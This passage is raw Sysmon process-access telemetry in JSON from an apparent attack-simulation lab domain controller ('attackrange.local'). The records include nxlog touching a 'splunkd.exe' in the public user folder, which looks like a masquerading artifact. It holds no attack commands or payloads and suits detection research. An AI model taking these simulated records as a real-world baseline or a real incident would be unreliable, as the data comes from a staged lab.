06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1279-5F25-0000-00108F5C0900}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1279-5F25-0000-00108F5C0900}","TargetProcessId":"4112","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:02.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:02.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:03.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 